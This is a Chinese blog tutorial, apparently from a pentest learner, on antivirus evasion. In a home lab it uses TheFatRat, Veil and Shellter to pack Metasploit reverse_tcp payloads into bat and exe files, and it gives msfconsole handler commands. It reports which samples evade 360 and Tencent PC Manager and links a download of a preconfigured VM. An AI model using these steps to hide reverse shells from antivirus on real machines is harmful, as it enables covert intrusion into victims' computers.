windows免杀工具三部曲(一)

前言

在渗透测试中经常遇到有杀毒的软件,不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。这里推荐三款免杀工具(亲测有效)

实验环境

windows 7 (安装电脑管家)(IP:192.168.72.154)
kali (IP:192.168.72.173)
windows 10 (360安全卫士)(IP:192.168.72.1)

TheFatRat工具

安装

参考资料:Msfvenom傻瓜化后门生成工具
安装过程不算麻烦。我这里已经安装好啦。

image.png

使用
image.png

选择生成bat文件,听说可以过360。

image.png

选择经常使用的payload,和metasploit保持一致。

image.png

这里会生成bat文件。该代码为bat源码。
将生成的kali.bat文件剪贴到windows7靶机上进行测试。

msfconsole 
use exploit/multi/handler 
set payload  windows/meterpreter/reverse_tcp
set lport 5555
set lhost 192.168.72.173
image.png

经测试发现可以电脑管家没有报毒,但无法绕过360安全卫士。

Veil工具

安装

veil-evasion工具安装起来比较麻烦,我也是安装好久也装上的。但依然存在问题。
如果感觉安装过程太繁琐,可以去云盘上下载直接使用。
下载地址见页尾
这里推荐veil3.1版本的安装教程:Veil3.1免杀安装

image.png

使用
image.png

选择C语言编写的payload。

image.png

进行必要的配置。

image.png

生成文件的信息。
将生成文件kali.exe剪切到windows7下进行测试。

image.png

依然是绕过电脑管家,无法绕过360。
在尝试使用 python/shellcode_inject/aes_encrypt模块时出现了错误,无法进行有效免杀

Shellter工具

安装

Kali Shellter 5.1:动态ShellCode注入工具 绕过安全软件
我并没有git下来进行安装,而是使用的命令

apt-get install shellter 
image.png
应用
image.png

PE目标为plink.exe

cp /usr/share/windows-binaries/plink.exe  /root
image.png

依然是选择熟悉的reverse_tcp,进行一些配置即可。

image.png

将生成的文件剪切到windows下。
在windows10通过cmd运行plink.exe

plink.exe  192.168.72.173

更多的使用方法--help

image.png

同样的配置。

image.png

成功得到session会话,且没有被360安全卫士拦截。

附加:

我这里把安装好的环境克隆出来了。下载后只需要打来虚拟机运行即可。
用户名root,密码123456..
百度云盘
https://pan.baidu.com/s/1P9dOiSncPga2lBeZ4xxxdg
提取码: xc37

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,921评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,635评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,393评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,836评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,833评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,685评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,043评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,694评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,671评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,670评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,779评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,424评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,027评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,984评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,214评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,108评论 2 351
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,517评论 2 343

推荐阅读更多精彩内容

  • 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来...
    Littleston阅读 3,314评论 0 12
  • 转自:http://www.freebuf.com/sectool/105524.html 本文为作者总结自己在渗...
    许安念安阅读 5,426评论 0 10
  • 一、命令行 1. calc-----------启动计算器 2.certmgr.msc----证书管理实用程序 3...
    小小辛_c阅读 698评论 0 2
  • 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来...
    灰猩猩阅读 5,759评论 0 5
  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小沐子_IT阅读 2,052评论 0 4